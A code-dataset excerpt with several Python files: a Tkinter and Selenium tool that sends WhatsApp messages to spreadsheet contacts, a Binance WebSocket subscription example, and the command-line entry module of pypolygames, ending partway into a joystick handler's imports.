source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
main.py | import os
from tkinter import *
from tkinter import ttk
import PIL
from PIL import ImageTk, Image
from tkinter import filedialog
import time
import pandas as pd
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import threading
from tkinter import messagebox
# CLASSE PARA ENVIO DE MENSAGENS
class Automation():
    """Drives WhatsApp Web through Selenium to send a text message (and
    optionally an image) to every contact listed in contatos.xlsx."""

    def __init__(self):
        print('Iniciando...')

    def run(self, input_texto, checkBox_value, path):
        """Open WhatsApp Web, wait for the QR-code scan, then process contacts.

        input_texto    -- message text to send to every contact
        checkBox_value -- 1 when an image should be attached as well
        path           -- filesystem path of the image (ignored otherwise)
        """
        self.texto = input_texto
        self.ckb_value = checkBox_value
        self.image_path = path
        self.driver = webdriver.Chrome()
        self.driver.get('https://web.whatsapp.com/')
        # Fixed wait for the user to scan the QR code; no login detection.
        time.sleep(10)
        print(self.texto)
        self.planilha_contatos()

    # LOADS THE CONTACT SPREADSHEET
    def planilha_contatos(self):
        # Requires contatos.xlsx with a 'contatos' sheet containing
        # 'Nome' and 'Numero' columns.
        self.tabela = pd.read_excel('contatos.xlsx', sheet_name='contatos')
        self.buscar_contatos(self.tabela)

    # ITERATES OVER NAME AND NUMBER FROM THE SPREADSHEET
    def buscar_contatos(self, tabela):
        self.maxcontatos = len(tabela.index)
        for x in range(self.maxcontatos):
            print(tabela.Nome[x], tabela.Numero[x])
            self.whatsapp(tabela.Nome[x], tabela.Numero[x])

    def whatsapp(self, nome, numero):
        """Open the chat for *numero* pre-filled with the message and send it."""
        from urllib.parse import quote
        from selenium.webdriver.common.by import By
        # URL-encode the message so spaces, '&', '#', etc. survive the query
        # string (the original raw interpolation broke on such characters).
        link = f"https://web.whatsapp.com/send?phone={numero}&text={quote(self.texto)}"
        self.driver.get(link)
        time.sleep(4)
        # find_element(By.XPATH, ...) replaces find_element_by_xpath, which
        # was removed in Selenium 4.3; this form also works on Selenium 3.
        enviar_msg = self.driver.find_element(By.XPATH, '//*[@id="main"]/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]')
        enviar_msg.send_keys(Keys.ENTER)
        time.sleep(2)
        self.enviar_img()

    def enviar_img(self):
        """Attach and send the chosen image when the checkbox was ticked."""
        if self.ckb_value == 1:
            from selenium.webdriver.common.by import By
            time.sleep(4)
            self.driver.find_element(By.CSS_SELECTOR, "span[data-icon='clip']").click()
            attach = self.driver.find_element(By.CSS_SELECTOR, "input[type='file']")
            attach.send_keys(self.image_path)
            time.sleep(1)
            send = self.driver.find_element(By.XPATH, '//*[@id="app"]/div[1]/div[1]/div[2]/div[2]/span/div[1]/span/div[1]/div/div[2]/div/div[1]/div[3]/div/div/div[2]/div[1]/div[2]')
            send.send_keys(Keys.ENTER)
            time.sleep(2)
class Aplication():
    """Tkinter GUI: collects the message text and an optional image, then
    launches the WhatsApp automation on a background thread."""

    def __init__(self):
        self.root = Tk()
        self.automatizar = Automation()
        # STATE AND COLORS
        self.vars()
        self.palette()
        # WIDGETS
        self.window()
        self.frames()
        self.labels()
        self.textbox()
        self.buttons()
        self.checkbox()
        self.panel()
        # MAIN LOOP (blocks until the window is closed)
        self.root.mainloop()

    def vars(self):
        """Initialise state shared across the widgets."""
        self.root_path = os.getcwd()
        # Image chosen by the user; None until file_open() succeeds.  The
        # original never initialised this, so start() raised AttributeError
        # when the checkbox was ticked without selecting a file.
        self.path = None
        # Checkbox state (1 = attach an image)
        self.var_ckb1 = IntVar()
        # Default preview image ('midia.png' must ship next to the script).
        self.image_path = Image.open('midia.png')
        self.imagem_defaut = ImageTk.PhotoImage(self.image_path)

    def palette(self):
        """Colour constants for the dark theme."""
        self.text_color = '#D9D9D9'
        self.textbox_color = '#d4d4d4'
        self.buttons_color = '#d4d4d4'
        self.checkbox_color = '#45475b'
        self.label_color = '#45475b'
        self.frame_color = '#45475b'
        self.bg_color = '#282934'

    def window(self):
        """Main window geometry and attributes."""
        self.root.title("WhatsAutomation")
        self.root.geometry("400x680")
        self.root.resizable(True, True)
        self.root.maxsize(width=600, height=800)
        self.root.minsize(width=300, height=500)
        self.root.configure(background=self.bg_color)
        self.root.wm_attributes("-topmost", True)  # keep window on top

    def frames(self):
        # MESSAGE TEXTBOX
        self.frame_1 = Frame(self.root, bg=self.frame_color)
        self.frame_1.place(relx=.02, rely=.02, relwidth=.96, relheight=.38)
        # CHECKBOX | OPEN-FILE BUTTON
        self.frame_2 = Frame(self.root, bg=self.frame_color)
        self.frame_2.place(relx=.02, rely=.41, relwidth=.96, relheight=.06)
        # IMAGE PREVIEW
        self.frame_3 = Frame(self.root, bg=self.frame_color)
        self.frame_3.place(relx=.02, rely=.482, relwidth=.96, relheight=.40)
        # SEND BUTTON
        self.frame_4 = Frame(self.root, bg=self.frame_color)
        self.frame_4.place(relx=.02, rely=.895, relwidth=.96, relheight=.09)

    def labels(self):
        self.label_1 = Label(self.frame_1, text='Mensagem a ser enviada:', bg=self.label_color, fg=self.text_color)
        self.label_1.place(relx=.3, rely=.03)

    def textbox(self):
        self.textbox_1 = Text(self.frame_1, height=9, width=37, bg=self.textbox_color, pady=10, padx=10, font='sans-serif')
        self.textbox_1.place(relx=.04, rely=.14, relwidth=.92, relheight=.80)

    def buttons(self):
        # 'Open file' stays disabled until the image checkbox is ticked.
        self.button_1 = Button(self.frame_2, text='Open file', command=self.file_open, bg=self.buttons_color, state=DISABLED)
        self.button_1.place(relx=.26, rely=.16, relwidth=.2, relheight=.7)
        self.button_2 = Button(self.frame_4, text='ENVIAR', command=self.start)
        self.button_2.place(relx=.338, rely=.30, relwidth=.3, relheight=.4)

    def checkbox(self):
        self.checkbox_1 = Checkbutton(self.frame_2, text='Imagem', onvalue=1, offvalue=0, variable=self.var_ckb1, command=self.func_checkbox1, bg=self.checkbox_color, activebackground=self.checkbox_color, activeforeground=self.text_color)
        self.checkbox_1['fg'] = '#D9D9D9'
        self.checkbox_1.place(relx=.50, rely=.16, relheight=.7)

    def panel(self):
        self.panel_1 = Label(self.frame_3, image=self.imagem_defaut, bg='#45475b', state=DISABLED, width=200, height=200)
        self.panel_1.place(relx=.24, rely=.08, relwidth=.5, relheight=.84)

    def func_checkbox1(self):
        """Enable/disable the image widgets when the checkbox toggles."""
        if self.var_ckb1.get() == 1:
            self.button_1.config(state=NORMAL)
            self.panel_1.config(state=NORMAL)
            self.checkbox_1.configure(selectcolor="green")
        elif self.var_ckb1.get() == 0:
            self.button_1.config(state=DISABLED)
            self.panel_1.config(state=DISABLED)
            self.checkbox_1.configure(selectcolor="#D9D9D9")
        else:
            print('Valor Invalido')

    def file_open(self):
        """Let the user pick an image and preview it in the panel."""
        try:
            chosen = filedialog.askopenfilename(initialdir='C://')
            if not chosen:
                # Dialog cancelled: keep the previous selection (the original
                # passed '' to Image.open, raising an unhandled error).
                return
            self.new_image = ImageTk.PhotoImage(Image.open(chosen))
            self.panel_1.configure(image=self.new_image)
            # Only record the path once the image loaded successfully.
            self.path = chosen
        except AttributeError:
            print('Selecione uma imagem')
        except PIL.UnidentifiedImageError:
            print('Formato invalido')

    def start(self):
        """Validate inputs and run the automation on a worker thread."""
        textbox_1_Value = self.textbox_1.get("1.0", "end-1c")
        checkBox_value = self.var_ckb1.get()
        if checkBox_value == 1 and not self.path:
            # Image requested but none chosen: warn instead of crashing.
            messagebox.showinfo("Info", "Selecione uma imagem")
            return
        if checkBox_value != 1:
            self.path = ' '
        # Typo fixed: 'WahtsApp' -> 'WhatsApp'.
        messagebox.showinfo("Info", "Abra o WhatsApp você tem 10s para escanear o codigo")
        # daemon=True so a running send cannot keep the process alive after
        # the window is closed.
        threading.Thread(
            target=self.automatizar.run,
            args=(textbox_1_Value, checkBox_value, self.path),
            daemon=True,
        ).start()
# Script entry point: construct the GUI (the Tk mainloop runs inside __init__).
if __name__ == '__main__':
    app = Aplication()
example_subscribe.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# Obtain the library logger (level/handlers come from basicConfig below).
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
# Log to '<this script>.log' using str.format-style ({}) placeholders.
logging.basicConfig(level=logging.INFO,
                    filename=os.path.basename(__file__) + '.log',
                    format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
                    style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
    """Worker loop: drain the manager's stream_buffer until shutdown.

    Ends the worker (via SystemExit) once the manager reports it is stopping.
    Printing of the payloads is intentionally disabled.
    """
    while not binance_websocket_api_manager.is_manager_stopping():
        record = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if record is False:
            # Buffer empty: back off briefly before polling again.
            time.sleep(0.01)
        # else: payload deliberately discarded (printing disabled)
    exit(0)
# Manager for the binance.com exchange; received payloads land in its stream_buffer.
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com")
# start a worker thread to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# NOTE(review): `markets` and `channels` below are defined but never used.
markets = ['bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
           'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
           'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
           'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc']
channels = ['trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']
# Create one stream, then exercise subscribe/unsubscribe on it.
markets_1 = ['bnbbtc', 'ethbtc']
channels_1 = ['trade', 'kline_1m', '!ticker']
stream_id = binance_websocket_api_manager.create_stream(channels_1, markets_1)
binance_websocket_api_manager.unsubscribe_from_stream(stream_id=stream_id, markets="BNBBTC")
markets_2 = ['batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
             'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_2)
markets_3 = ['!miniTicker']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_3)
markets_4 = ['engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax', 'xmrusdt',
             'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
             'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
             'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_4)
time.sleep(1)
# Request the current subscriptions (the reply arrives asynchronously).
binance_websocket_api_manager.get_stream_subscriptions(stream_id)
time.sleep(2)
channels_2 = ['trade', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']
binance_websocket_api_manager.unsubscribe_from_stream(stream_id, channels=channels_2)
request_id = binance_websocket_api_manager.get_stream_subscriptions(stream_id)
# Poll until the subscription snapshot for request_id has been received.
while binance_websocket_api_manager.get_result_by_request_id(request_id) is False:
    print("Wait to receive the result!")
    time.sleep(0.5)
print(str(binance_websocket_api_manager.get_result_by_request_id(request_id)))
time.sleep(10)
# Print live stream info once per second forever.
while True:
    #binance_websocket_api_manager.print_summary()
    binance_websocket_api_manager.print_stream_info(stream_id)
    #binance_websocket_api_manager.get_stream_subscriptions(stream_id)
    time.sleep(1)
|
__main__.py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
from pathlib import Path
import sys
import warnings
import time
from dataclasses import astuple
import argparse
from multiprocessing import Process
from typing import Union, List
from .params import (
GameParams,
ModelParams,
OptimParams,
SimulationParams,
ExecutionParams,
EvalParams,
)
from .utils import CommandHistory
from .training import run_training
from .evaluation import run_evaluation
from .human import run_human_played_game
from .human import run_tp_played_game
from .convert import convert_checkpoint
from .draw_model import draw_model
# Top-level help text: printed when `pypolygames` runs with no arguments and
# used as the argparse description (see parse_args).
DOC = """The python package `pypolygames` can be used in either of the following modes:
- `pypolygames train` (training mode): a game and a model (as well as several other options, see below) are chosen and the model is iteratively trained with MCTS
- `pypolygames eval` (evaluation mode): the model confronts either a pure MCTS or another neural network powered MCTS. The evaluation of a training can be done either offline (from checkpoints periodically saved) or in real time; in that case, the evaluation considers only the most recent checkpoint in order to follow closely the training, skipping some checkpoints in case the eval computation takes longer than the time becween consecutive checkpoints. It is displayed through visdom.
- `pypolygames traineval` (training + evaluation mode): it mixes the two previous modes and allow to launch one command instead of two. With the `real_time` option the modes can be launched in parallel instead of sequentially.
- `pypolygames human` (human mode): a human player plays against the machine
Trainings log the following relevant files in the `checkpoint_dir`:
- `model.pt`
- `train.log`
- `stat.tb`
- `checkpoints_<epoch>.pt` for for checkpoints saved each `saving_period` epoch (e.g., if `saving_period == 10`, `checkpoints_0.pt`, `checkpoints_9.pt`, `checkpoints_19.pt`, `checkpoints_29.pt`)
By default, the checkpoint_dir is exps/dev/game_<game_name>_model_<model_name>_feat_<featurization>_GMT_<YYYYMMDDHHMMSS>
This directory will be the `checkpoint_dir` directory used by evaluation to retrieve the checkpoints to perform eval computation."""
def _check_arg_consistency(args: argparse.Namespace) -> None:
# Most of the consistency is done in the `__post_init__` methods in the params class
if (
args.command_history.last_command_contains("pure_mcts")
and getattr(args, "game_name", None) is None
):
raise ValueError(
"In '--pure_mcts' the game must be specified with '--game_name'"
)
if args.command_history.last_command_contains("human"):
if (
getattr(args, "pure_mcts", None) is False
and getattr(args, "init_checkpoint", None) is None
):
raise ValueError(
"The human player need to play either a '--pure_mcts' "
"or a '--init_checkpoint' neural network powered MCTS"
)
if args.command_history.last_command_contains("device_opponent"):
if getattr(args, "checkpoint_opponent", None) is None:
raise ValueError(
"If the opponent is a pure MCTS player "
"('--checkpoint_opponent' not set), "
"all its computation will happen on CPU, "
"'--device_opponent' should not be set"
)
if args.command_history.last_command_contains(
"per_thread_batchsize"
) and args.command_history.last_command_contains("act_batchsize"):
raise ValueError(
"When '--per_thread_batchsize' is set, '--act_batchsize' is not used"
)
if getattr(args, "total_time", 0) is not None and getattr(args, "total_time", 0) > 0:
if args.command_history.last_command_contains("num_rollouts"):
raise ValueError(
"When a '--total_time' is set, "
"the '--num_rollouts' will adapt automatically and should not be set"
)
def parse_args() -> argparse.Namespace:
    """Build the multi-command argument parser and return the parsed args.

    Sub-commands: train, eval, traineval, human, tp, convert, draw_model.
    Each Params dataclass contributes its CLI fields through `arg_fields()`.
    The bare top-level parser also accepts (almost) everything but hides it
    from --help via argparse.SUPPRESS, and defaults to running traineval
    with a deprecation warning.
    """
    parser = argparse.ArgumentParser(
        description=DOC, formatter_class=argparse.RawDescriptionHelpFormatter, allow_abbrev=False,
    )
    parser.set_defaults(func=run_training_and_evaluation_from_args_warning)
    subparsers = parser.add_subparsers(
        help="Modes to be chosen from: `python -m pypolygames MODE`"
    )
    # TRAINING
    parser_train = subparsers.add_parser("train")
    parser_train.set_defaults(func=run_training_from_args)
    # EVALUATION
    parser_eval = subparsers.add_parser("eval")
    parser_eval.set_defaults(func=run_evaluation_from_args)
    # TRAINING + EVALUATION
    parser_traineval = subparsers.add_parser("traineval")
    parser_traineval.set_defaults(func=run_training_and_evaluation_from_args)
    # HUMAN-PLAYED GAME
    parser_human = subparsers.add_parser("human")
    parser_human.set_defaults(func=run_human_played_game_from_args)
    # TEXT-PROTOCOLE GAME
    parser_tp = subparsers.add_parser("tp")
    parser_tp.set_defaults(func=run_tp_played_game_from_args)
    # CONVERT CHECKPOINT COMMAND
    parser_convert = subparsers.add_parser("convert")
    parser_convert.set_defaults(func=convert_checkpoint_from_args)
    parser_convert.add_argument('--out', type=str, required=True, help='File name to save the converted checkpoint to')
    parser_convert.add_argument('--skip', type=str, nargs="*", help='List of attributes to not copy, leaving them initialized')
    parser_convert.add_argument(
        '--auto_tune_nnsize', action="store_true",
        help='Tune nnsize automatically such that number of filters in hidden layers remains unchanged.'
    )
    # NOTE(review): type=bool parses any non-empty string (even "False") as
    # True -- confirm whether action="store_true" was intended here.
    parser_convert.add_argument(
        '--zero_shot', type=bool, default=False,
        help='Convert for zero-shot evaluation without training; this will initialise any skipped or new params to 0.'
    )
    parser_convert.add_argument(
        '--move_source_channels', type=int, nargs="*",
        help=('For fully convolutional architectures, for every channel in the destination game\'s move tensors, '
              'specify the channel from the original tensor that we should transfer weights from.')
    )
    parser_convert.add_argument(
        '--state_source_channels', type=int, nargs="*",
        help=('For fully convolutional architectures, for every channel in the destination game\'s state tensors, '
              'specify the channel from the original tensor that we should transfer weights from.')
    )
    # DRAW MODEL COMMAND
    parser_draw_model = subparsers.add_parser("draw_model")
    parser_draw_model.set_defaults(func=draw_model_from_args)
    parser_draw_model.add_argument('--out', type=str, required=True, help='File name (without extension) to save figure to.')
    # Game params: registered on train/traineval/human/convert/draw_model,
    # and (hidden) on the bare parser.
    train_game_params_group = parser_train.add_argument_group(
        "Game parameters",
        "Not to be specified in case of loading a checkpoint or a pretrained model",
    )
    traineval_game_params_group = parser_traineval.add_argument_group(
        "Game parameters",
        "Not to be specified in case of loading a checkpoint or a pretrained model",
    )
    game_params_group = parser.add_argument_group(
        "Game parameters",
        "Not to be specified in case of loading a checkpoint or a pretrained model",
    )
    human_game_params_group = parser_human.add_argument_group(
        "Game parameters",
        "Mandatory for pure MTCS, "
        "but not to be specified in case of loading a pretrained model",
    )
    for arg_name, arg_field in GameParams.arg_fields():
        train_game_params_group.add_argument(arg_field.name, **arg_field.opts)
        traineval_game_params_group.add_argument(arg_field.name, **arg_field.opts)
        game_params_group.add_argument(
            arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
        )
        human_game_params_group.add_argument(arg_field.name, **arg_field.opts)
        parser_convert.add_argument(arg_field.name, **arg_field.opts)
        parser_draw_model.add_argument(arg_field.name, **arg_field.opts)
    # Model params: 'pure_mcts' is only meaningful for the human mode.
    train_model_params_group = parser_train.add_argument_group(
        "Model parameters",
        "Not to be specified in case of loading a checkpoint or a pretrained model",
    )
    traineval_model_params_group = parser_traineval.add_argument_group(
        "Model parameters",
        "Not to be specified in case of loading a checkpoint or a pretrained model",
    )
    model_params_group = parser.add_argument_group("Model parameters")
    human_model_params_group = parser_human.add_argument_group(
        "Model parameters",
        "The machine model can be either a '--pure_mcts' or "
        "a '--init_checkpoint' neural network powered MCTS",
    )
    for arg_name, arg_field in ModelParams.arg_fields():
        if arg_name != "pure_mcts":
            train_model_params_group.add_argument(arg_field.name, **arg_field.opts)
            traineval_model_params_group.add_argument(arg_field.name, **arg_field.opts)
            model_params_group.add_argument(
                arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
            )
        if arg_name in {"pure_mcts", "init_checkpoint"}:
            human_model_params_group.add_argument(arg_field.name, **arg_field.opts)
        if arg_name != "pure_mcts":
            parser_convert.add_argument(arg_field.name, **arg_field.opts)
            parser_draw_model.add_argument(arg_field.name, **arg_field.opts)
    # Optimizer params (training-related modes only)
    train_optim_params_group = parser_train.add_argument_group("Optimizer parameters")
    traineval_optim_params_group = parser_traineval.add_argument_group(
        "Optimizer parameters"
    )
    optim_params_group = parser.add_argument_group("Optimizer parameters")
    for _, arg_field in OptimParams.arg_fields():
        train_optim_params_group.add_argument(arg_field.name, **arg_field.opts)
        traineval_optim_params_group.add_argument(arg_field.name, **arg_field.opts)
        optim_params_group.add_argument(
            arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
        )
    # Simulation params: the human-only timing options are excluded from the
    # training parsers.
    train_simulation_params_group = parser_train.add_argument_group(
        "Simulation parameters"
    )
    traineval_simulation_params_group = parser_traineval.add_argument_group(
        "Simulation parameters"
    )
    simulation_params_group = parser.add_argument_group("Simulation parameters")
    human_simulation_params_group = parser_human.add_argument_group(
        "Simulation parameters"
    )
    for arg_name, arg_field in SimulationParams.arg_fields():
        if arg_name not in {
            "human_first",
            "time_ratio",
            "total_time",
        }:  # , "num_actor"}:
            train_simulation_params_group.add_argument(arg_field.name, **arg_field.opts)
            traineval_simulation_params_group.add_argument(
                arg_field.name, **arg_field.opts
            )
            simulation_params_group.add_argument(
                arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
            )
        #if arg_name in {"num_actor", "num_rollouts"}:
        if True:
            human_simulation_params_group.add_argument(arg_field.name, **arg_field.opts)
    # Execution params
    train_execution_params_group = parser_train.add_argument_group(
        "Execution parameters"
    )
    traineval_execution_params_group = parser_traineval.add_argument_group(
        "Execution parameters"
    )
    human_execution_params_group = parser_human.add_argument_group(
        "Execution parameters"
    )
    execution_params_group = parser.add_argument_group("Execution parameters")
    for arg_name, arg_field in ExecutionParams.arg_fields():
        if arg_name not in {"human_first", "time_ratio", "total_time"}:
            train_execution_params_group.add_argument(arg_field.name, **arg_field.opts)
            traineval_execution_params_group.add_argument(
                arg_field.name, **arg_field.opts
            )
            execution_params_group.add_argument(
                arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
            )
        if arg_name in {"human_first", "time_ratio", "total_time", "device", "seed"}:
            human_execution_params_group.add_argument(arg_field.name, **arg_field.opts)
    # Evaluation params: traineval derives checkpoint_dir/checkpoint itself.
    eval_eval_params_group = parser_eval.add_argument_group("Evaluation parameters")
    traineval_eval_params_group = parser_traineval.add_argument_group(
        "Evaluation parameters"
    )
    eval_params_group = parser.add_argument_group("Evaluation parameters")
    for arg_name, arg_field in EvalParams.arg_fields():
        eval_eval_params_group.add_argument(arg_field.name, **arg_field.opts)
        if arg_name not in {"checkpoint_dir", "checkpoint"}:
            traineval_eval_params_group.add_argument(arg_field.name, **arg_field.opts)
        eval_params_group.add_argument(
            arg_field.name, **{**arg_field.opts, **dict(help=argparse.SUPPRESS)}
        )
    args = parser.parse_args()
    args.command_history = CommandHistory()
    # check arg consistency
    _check_arg_consistency(args)
    return args
def _get_game_features(game_params: GameParams) -> str:
    """Serialize every field of *game_params* into one underscore-joined string."""
    return "_".join(map(str, astuple(game_params)))
def _get_timestamp() -> str:
return time.strftime("%Y%m%d%H%M%S", time.gmtime())
def update_and_create_checkpoint_dir(
    game_params: GameParams,
    model_params: ModelParams,
    execution_params: ExecutionParams,
) -> None:
    """Default *execution_params.checkpoint_dir* when unset, then create it."""
    if execution_params.checkpoint_dir is None:
        # Default layout: exps/dev/game_<g>_model_<m>_feat_<features>_GMT_<ts>
        folder_name = "game_{}_model_{}_feat_{}_GMT_{}".format(
            game_params.game_name,
            model_params.model_name,
            _get_game_features(game_params),
            _get_timestamp(),
        )
        execution_params.checkpoint_dir = Path("exps").absolute() / "dev" / folder_name
    execution_params.checkpoint_dir.mkdir(exist_ok=True, parents=True)
def instanciate_params_from_args(
    Dataclass, args: argparse.Namespace
) -> Union[
    GameParams, ModelParams, OptimParams, SimulationParams, ExecutionParams, EvalParams
]:
    """Build a params dataclass from the matching attributes of *args*.

    Missing attributes default to None so partial namespaces are accepted.
    """
    kwargs = {}
    for param, _ in Dataclass.arg_fields():
        kwargs[param] = getattr(args, param, None)
    return Dataclass(**kwargs)
def run_training_from_args(args: argparse.Namespace):
    """Entry point for `pypolygames train`: build all params and start training."""
    game_params = instanciate_params_from_args(GameParams, args)
    model_params = instanciate_params_from_args(ModelParams, args)
    optim_params = instanciate_params_from_args(OptimParams, args)
    simulation_params = instanciate_params_from_args(SimulationParams, args)
    execution_params = instanciate_params_from_args(ExecutionParams, args)
    # Pick (and create) a default checkpoint directory when none was given.
    update_and_create_checkpoint_dir(
        game_params=game_params,
        model_params=model_params,
        execution_params=execution_params,
    )
    run_training(
        command_history=args.command_history,
        game_params=game_params,
        model_params=model_params,
        optim_params=optim_params,
        simulation_params=simulation_params,
        execution_params=execution_params,
    )
def run_evaluation_from_args(args: argparse.Namespace):
    """Entry point for `pypolygames eval`: evaluate checkpoints."""
    run_evaluation(
        eval_params=instanciate_params_from_args(EvalParams, args),
        execution_params=instanciate_params_from_args(ExecutionParams, args),
    )
def run_training_and_evaluation_from_args(args: argparse.Namespace):
    """Entry point for `pypolygames traineval`.

    With --real_time the evaluation runs in a separate process concurrently
    with training; otherwise training completes first and a single evaluation
    of the last checkpoint follows.
    """
    command_history = args.command_history
    game_params = instanciate_params_from_args(GameParams, args)
    model_params = instanciate_params_from_args(ModelParams, args)
    optim_params = instanciate_params_from_args(OptimParams, args)
    simulation_params = instanciate_params_from_args(SimulationParams, args)
    execution_params = instanciate_params_from_args(ExecutionParams, args)
    # create the save dir
    update_and_create_checkpoint_dir(
        game_params=game_params,
        model_params=model_params,
        execution_params=execution_params,
    )
    # Propagate the (possibly defaulted) checkpoint dir so EvalParams sees it.
    args.checkpoint_dir = execution_params.checkpoint_dir
    eval_params = instanciate_params_from_args(EvalParams, args)
    if args.real_time:
        # NOTE(review): run_evaluation is called elsewhere with both
        # eval_params and execution_params -- confirm this single-positional
        # call matches its signature.
        eval_process = Process(target=run_evaluation, args=(eval_params,))
        eval_process.start()
        run_training(
            command_history=command_history,
            game_params=game_params,
            model_params=model_params,
            optim_params=optim_params,
            simulation_params=simulation_params,
            execution_params=execution_params,
        )
        eval_process.join()
    else:
        run_training(
            command_history=command_history,
            game_params=game_params,
            model_params=model_params,
            optim_params=optim_params,
            simulation_params=simulation_params,
            execution_params=execution_params,
        )
        run_evaluation(eval_params=eval_params, only_last=True)
def run_human_played_game_from_args(args: argparse.Namespace):
    """Entry point for `pypolygames human`: one game against a human player."""
    params = {
        "game_params": instanciate_params_from_args(GameParams, args),
        "model_params": instanciate_params_from_args(ModelParams, args),
        "simulation_params": instanciate_params_from_args(SimulationParams, args),
        "execution_params": instanciate_params_from_args(ExecutionParams, args),
    }
    # A human session always plays exactly one game.
    params["simulation_params"].num_game = 1
    run_human_played_game(**params)
def run_tp_played_game_from_args(args: argparse.Namespace):
    """Entry point for `pypolygames tp`: one game over the text protocol."""
    params = {
        "game_params": instanciate_params_from_args(GameParams, args),
        "model_params": instanciate_params_from_args(ModelParams, args),
        "simulation_params": instanciate_params_from_args(SimulationParams, args),
        "execution_params": instanciate_params_from_args(ExecutionParams, args),
    }
    # Text-protocol sessions always play exactly one game.
    params["simulation_params"].num_game = 1
    run_tp_played_game(**params)
def convert_checkpoint_from_args(args: argparse.Namespace):
    """Entry point for `pypolygames convert`: rewrite a checkpoint for a new game/model."""
    convert_checkpoint(
        command_history=args.command_history,
        game_params=instanciate_params_from_args(GameParams, args),
        model_params=instanciate_params_from_args(ModelParams, args),
        out=args.out,
        skip=args.skip,
        auto_tune_nnsize=args.auto_tune_nnsize,
        zero_shot=args.zero_shot,
        move_source_channels=args.move_source_channels,
        state_source_channels=args.state_source_channels,
    )
def draw_model_from_args(args: argparse.Namespace):
    """Entry point for `pypolygames draw_model`: render the model to a figure file."""
    draw_model(
        game_params=instanciate_params_from_args(GameParams, args),
        model_params=instanciate_params_from_args(ModelParams, args),
        out=args.out,
    )
def run_training_and_evaluation_from_args_warning(args: argparse.Namespace):
    """Default handler when no sub-command is given on the command line."""
    if len(sys.argv) == 1:
        # Bare `pypolygames`: just print the package documentation.
        print(DOC)
        return
    # Otherwise fall back to traineval, but warn that this is deprecated.
    warnings.warn(
        "'pypolygames' called with arguments runs as 'pypolygames traineval'",
        DeprecationWarning,
    )
    run_training_and_evaluation_from_args(args)
# CLI entry point: parse arguments and dispatch to the selected sub-command.
if __name__ == "__main__":
    args = parse_args()
    args.func(args)
|
JoystickHandler.py | #!/usr/bin/python3
import LogHandler
import os
import time
import threading
